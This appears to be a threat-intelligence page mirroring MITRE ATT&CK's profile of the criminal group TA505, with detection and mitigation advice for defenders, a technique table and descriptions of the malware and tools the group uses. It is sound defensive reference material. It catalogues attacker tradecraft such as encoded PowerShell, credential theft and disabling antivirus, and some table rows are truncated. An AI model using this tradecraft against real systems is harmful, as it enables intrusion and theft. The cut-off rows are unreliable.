G0092: TA505
Analyst context for executives and security teams
TA505 matters because MITRE describes it as a long-running cyber criminal group known for frequently changing malware, influencing criminal malware distribution, and ransomware campaigns involving Clop. For leaders, the key issue is not a single indicator list; it is whether the organization can detect and respond when tooling changes across downloaders, RATs, credential theft, Active Directory discovery, and ransomware-related activity.
Executive priority
Prioritize TA505 as a readiness test for ransomware resilience, identity security, and SOC adaptability. Executives should ask whether endpoint, scripting, credential, and Active Directory telemetry are retained and usable during an incident; whether incident response can handle fast-changing malware families; and whether backup, containment, and evidence-collection processes are proven before ransomware pressure occurs.
Technical view
ATT&CK provides no official detection text for this group, so coverage should be validated through the related software and techniques. The relationship set is strongly Windows-oriented and includes Mimikatz, Net, Cobalt Strike, PowerSploit, TrickBot, Azorult, FlawedAmmyy, ServHelper, FlawedGrace, Dridex, Get2, SDBbot, BloodHound, AdFind, Clop, and Amadey. Related techniques include PowerShell, Windows Command Shell, Visual Basic, JavaScript, software packing, command obfuscation, encrypted or encoded files, and DLL injection. SOC teams should test visibility across script execution, command lines, process lineage, memory/process behavior, AD enumeration, credential-access tooling, downloader/backdoor activity, and ransomware-family alert handling.
Likely telemetry
- Endpoint process creation and command-line telemetry, especially PowerShell, cmd, Visual Basic, and JavaScript execution
- PowerShell script block, module, and operational logs where available
- Windows security and endpoint events related to credential dumping tools and suspicious access to credential material
- Active Directory query and enumeration evidence associated with tools such as BloodHound and AdFind
- Network connections and proxy/DNS records for downloader, RAT, and backdoor communications
Detection direction
- Because MITRE supplies no official detection guidance, base validation on relationship-driven behaviors rather than group name matching.
- Tune for suspicious combinations: scripting or shell execution followed by downloader/RAT behavior, AD discovery, credential tooling, lateral-use utilities, or ransomware-like file activity.
- Account for obfuscation: packed files, encoded content, and obfuscated commands can reduce signature-only effectiveness.
- Separate legitimate administration from abuse of tools such as Net, PowerShell, Cobalt Strike-like behavior, BloodHound, and AdFind by using user role, host role, execution context, parent process, timing, and change-ticket context.
- Validate Windows endpoint depth first, since most related software and several techniques are Windows-focused, while noting some related techniques and Cobalt Strike list Linux/macOS as possible platforms.
Mitigation priorities
- Strengthen identity and Active Directory hygiene first: reduce excessive privileges, monitor administrative activity, and prepare containment procedures for credential compromise.
- Harden scripting and command execution controls where operationally feasible, including PowerShell governance and logging.
- Improve endpoint prevention and detection for packed/encoded files, suspicious DLL injection, credential dumping, and unauthorized remote access tooling.
- Prepare ransomware resilience: tested backups, restore procedures, segmentation, and incident decision playbooks tied to Clop-related readiness without assuming current exposure.
- Maintain threat intelligence updates for the listed aliases and related malware/tools, but avoid relying only on static indicators because the group is described as frequently changing malware.
Analyst notes and limits
Aliases supplied by ATT&CK include TA505, Hive0065, Spandex Tempest, and CHIMBORAZO. The most useful defensive framing is a coverage assessment across related tooling and behaviors, not a claim that any one indicator proves TA505 activity. Relationship context highlights credential dumping, AD reconnaissance, scripting, obfuscation, remote access tools, downloaders, backdoors, and ransomware.
Platforms and tactics are not specified on the intrusion-set object itself, and official detection is not provided. Platform and behavior guidance here is inferred only from supplied related software and technique fields. Local telemetry, asset criticality, business process exposure, and confirmed incident evidence are required before assessing organizational exposure or attribution.
TA505
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1087.003 | Email Account Sub-technique | TA505 has used the tool EmailStealer to steal and send lists of e-mail addresses to a remote server.CitationTrend Micro TA505 June 2019 |
| Enterprise | T1583.001 | Domains Sub-technique | TA505 has registered domains to impersonate services such as Dropbox to distribute malware.CitationKorean FSI TA505 2020 |
| Enterprise | T1553.005 | Mark-of-the-Web Bypass Sub-technique | TA505 has used .iso files to deploy malicious .lnk files.CitationTrendMicro TA505 Aug 2019 |
| Enterprise | T1218.007 | Msiexec Sub-technique | TA505 has used |
| Enterprise | T1112 | Modify Registry | TA505 has used malware to disable Windows Defender through modification of the Registry.CitationKorean FSI TA505 2020 |
| Enterprise | T1588.002 | Tool Sub-technique | TA505 has used a variety of tools in their operations, including AdFind, BloodHound, Mimikatz, and PowerSploit.CitationNCC Group TA505 |
| Enterprise | T1204.002 | Malicious File Sub-technique | TA505 has used lures to get users to enable content in malicious attachments and execute malicious files contained in archives. For example, TA505 makes their malware look like legitimate Microsoft Word documents, .pdf and/or .lnk files. CitationProofpoint TA505 Sep 2017CitationProofpoint TA505 June 2018CitationProofpoint TA505 Jan 2019CitationCybereason TA505 April 2019CitationProofPoint SettingContent-ms July 2018CitationProofpoint TA505 Mar 2018CitationTrend Micro TA505 June 2019CitationProofpoint TA505 October 2019CitationIBM TA505 April 2020 |
| Enterprise | T1568.001 | Fast Flux DNS Sub-technique | TA505 has used fast flux to mask botnets by distributing payloads across multiple IPs.CitationTrend Micro TA505 June 2019 |
| Enterprise | T1027.013 | Encrypted/Encoded File Sub-technique | TA505 has password-protected malicious Word documents.CitationProofpoint TA505 Sep 2017 |
| Enterprise | T1027.002 | Software Packing Sub-technique | TA505 has used UPX to obscure malicious code.CitationIBM TA505 April 2020 |
| Enterprise | T1552.001 | Credentials In Files Sub-technique | TA505 has used malware to gather credentials from FTP clients and Outlook.CitationProofpoint TA505 Sep 2017 |
| Enterprise | T1059.005 | Visual Basic Sub-technique | TA505 has used VBS for code execution.CitationProofpoint TA505 Sep 2017CitationProofpoint TA505 June 2018CitationTrend Micro TA505 June 2019CitationIBM TA505 April 2020 |
| Enterprise | T1059.007 | JavaScript Sub-technique | TA505 has used JavaScript for code execution.CitationProofpoint TA505 Sep 2017CitationProofpoint TA505 June 2018 |
| Enterprise | T1204.001 | Malicious Link Sub-technique | TA505 has used lures to get users to click links in emails and attachments. For example, TA505 makes their malware look like legitimate Microsoft Word documents, .pdf and/or .lnk files. CitationProofpoint TA505 Sep 2017CitationProofpoint TA505 June 2018CitationProofpoint TA505 Jan 2019CitationCybereason TA505 April 2019CitationProofPoint SettingContent-ms July 2018CitationProofpoint TA505 Mar 2018CitationTrend Micro TA505 June 2019CitationProofpoint TA505 October 2019 |
| Enterprise | T1608.001 | Upload Malware Sub-technique | TA505 has staged malware on actor-controlled domains.CitationKorean FSI TA505 2020 |
| Enterprise | T1218.011 | Rundll32 Sub-technique | TA505 has leveraged |
| Enterprise | T1140 | Deobfuscate/Decode Files or Information | TA505 has decrypted packed DLLs with an XOR key.CitationNCC Group TA505 |
| Enterprise | T1555.003 | Credentials from Web Browsers Sub-technique | TA505 has used malware to gather credentials from Internet Explorer.CitationProofpoint TA505 Sep 2017 |
| Enterprise | T1027.010 | Command Obfuscation Sub-technique | TA505 has used base64 encoded PowerShell commands.CitationCybereason TA505 April 2019CitationDeep Instinct TA505 Apr 2019 |
| Enterprise | T1069 | Permission Groups Discovery | |
| Enterprise | T1105 | Ingress Tool Transfer | TA505 has downloaded additional malware to execute on victim systems.CitationCybereason TA505 April 2019CitationDeep Instinct TA505 Apr 2019CitationProofPoint SettingContent-ms July 2018 |
| Enterprise | T1588.001 | Malware Sub-technique | TA505 has used malware such as Azorult and Cobalt Strike in their operations.CitationNCC Group TA505 |
| Enterprise | T1078.002 | Domain Accounts Sub-technique | TA505 has used stolen domain admin accounts to compromise additional hosts.CitationIBM TA505 April 2020 |
| Enterprise | T1553.002 | Code Signing Sub-technique | TA505 has signed payloads with code signing certificates from Thawte and Sectigo.CitationCybereason TA505 April 2019CitationDeep Instinct TA505 Apr 2019CitationTrend Micro TA505 June 2019 |
| Enterprise | T1486 | Data Encrypted for Impact | |
| Enterprise | T1059.001 | PowerShell Sub-technique | TA505 has used PowerShell to download and execute malware and reconnaissance scripts.CitationProofpoint TA505 Sep 2017CitationProofPoint SettingContent-ms July 2018CitationCybereason TA505 April 2019CitationDeep Instinct TA505 Apr 2019 |
| Enterprise | T1566.001 | Spearphishing Attachment Sub-technique | TA505 has used spearphishing emails with malicious attachments to initially compromise victims.CitationProofpoint TA505 Sep 2017CitationProofpoint TA505 June 2018CitationProofpoint TA505 Jan 2019CitationCybereason TA505 April 2019CitationProofPoint SettingContent-ms July 2018CitationProofpoint TA505 Mar 2018CitationTrend Micro TA505 June 2019CitationProofpoint TA505 October 2019CitationIBM TA505 April 2020 |
| Enterprise | T1106 | Native API | TA505 has deployed payloads that use Windows API calls on a compromised host.CitationKorean FSI TA505 2020 |
| Enterprise | T1566.002 | Spearphishing Link Sub-technique | TA505 has sent spearphishing emails containing malicious links.CitationProofpoint TA505 Sep 2017CitationProofpoint TA505 Jan 2019CitationTrend Micro TA505 June 2019CitationProofpoint TA505 October 2019 |
| Enterprise | T1685 | Disable or Modify Tools | TA505 has used malware to disable Windows Defender.CitationKorean FSI TA505 2020 |
| Enterprise | T1559.002 | Dynamic Data Exchange Sub-technique | TA505 has leveraged malicious Word documents that abused DDE.CitationProofpoint TA505 June 2018 |
| Enterprise | T1055.001 | Dynamic-link Library Injection Sub-technique | TA505 has been seen injecting a DLL into winword.exe.CitationIBM TA505 April 2020 |
| Enterprise | T1071.001 | Web Protocols Sub-technique | TA505 has used HTTP to communicate with C2 nodes.CitationIBM TA505 April 2020 |
| Enterprise | T1059.003 | Windows Command Shell Sub-technique | TA505 has executed commands using |
Groups, software, and campaigns
S0552: AdFind
S0611: Clop
Clop is a ransomware family that was first observed in February 2019 and has been used against retail, transportation and logistics, education, manufacturing, engineering, automotive, energy, financial, aerospace, telecommunications, professional and legal services, healthcare, and high tech industries. Clop is a variant of the CryptoMix ransomware.[1][2][3]
S0344: Azorult
Azorult is a commercial Trojan that is used to steal information from compromised hosts. Azorult has been observed in the wild as early as 2016. In July 2018, Azorult was seen used in a spearphishing campaign against targets in North America. Azorult has been seen used for cryptocurrency theft. [1][2]
S0381: FlawedAmmyy
FlawedAmmyy is a remote access tool (RAT) that was first seen in early 2016. The code for FlawedAmmyy was based on leaked source code for a version of Ammyy Admin, a remote access software.[1]
S0002: Mimikatz
S0384: Dridex
Dridex is a prolific banking Trojan that first appeared in 2014. By December 2019, the US Treasury estimated Dridex had infected computers in hundreds of banks and financial institutions in over 40 countries, leading to more than $100 million in theft. Dridex was created from the source code of the Bugat banking Trojan (also known as Cridex).[1][2][3]
S0266: TrickBot
TrickBot is a Trojan spyware program written in C++ that first emerged in September 2016 as a possible successor to Dyre. TrickBot was developed and initially used by Wizard Spider for targeting banking sites in North America, Australia, and throughout Europe; it has since been used against all sectors worldwide as part of "big game hunting" ransomware campaigns.[1][2][3][4]
S0460: Get2
Get2 is a downloader written in C++ that has been used by TA505 to deliver FlawedGrace, FlawedAmmyy, Snatch and SDBbot.[1]
S0383: FlawedGrace
FlawedGrace is a fully featured remote access tool (RAT) written in C++ that was first observed in late 2017.[1]
S0154: Cobalt Strike
Cobalt Strike is a commercial, full-featured, remote access tool that bills itself as “adversary simulation software designed to execute targeted attacks and emulate the post-exploitation actions of advanced threat actors”. Cobalt Strike’s interactive post-exploit capabilities cover the full range of ATT&CK tactics, all executed within a single, integrated system.[1]
In addition to its own capabilities, Cobalt Strike leverages the capabilities of other well-known tools such as Metasploit and Mimikatz.[1]
S0382: ServHelper
ServHelper is a backdoor first observed in late 2018. The backdoor is written in Delphi and is typically delivered as a DLL file.[1]
S0521: BloodHound
BloodHound is an Active Directory (AD) reconnaissance tool that can reveal hidden relationships and identify attack paths within an AD environment.[1][2][3]
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 3.0 | Current bundle | 7fb924ac7a47… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
Proofpoint TA505 Sep 2017
Proofpoint Staff. (2017, September 27). Threat Actor Profile: TA505, From Dridex to GlobeImposter. Retrieved May 28, 2019.
Open source URL -
[2]
Proofpoint TA505 June 2018
Proofpoint Staff. (2018, June 8). TA505 shifts with the times. Retrieved May 28, 2019.
Open source URL -
[3]
Proofpoint TA505 Jan 2019
Schwarz, D. and Proofpoint Staff. (2019, January 9). ServHelper and FlawedGrace - New malware introduced by TA505. Retrieved May 28, 2019.
Open source URL -
[4]
NCC Group TA505
Terefos, A. (2020, November 18). TA505: A Brief History of Their Time. Retrieved July 14, 2022.
Open source URL -
[5]
Korean FSI TA505 2020
Financial Security Institute. (2020, February 28). Profiling of TA505 Threat Group That Continues to Attack the Financial Sector. Retrieved July 14, 2022.
Open source URL -
[6]
CHIMBORAZO
(Citation: Microsoft Threat Actor Naming July 2023)
-
[7]
Hive0065
(Citation: IBM TA505 April 2020)
-
[8]
IBM TA505 April 2020
Frydrych, M. (2020, April 14). TA505 Continues to Infect Networks With SDBbot RAT. Retrieved May 29, 2020.
Open source URL -
[9]
Microsoft Threat Actor Naming July 2023
Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.
Open source URL -
[10]
Spandex Tempest
(Citation: Microsoft Threat Actor Naming July 2023)
-
[11]
mitre-attack G0092Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.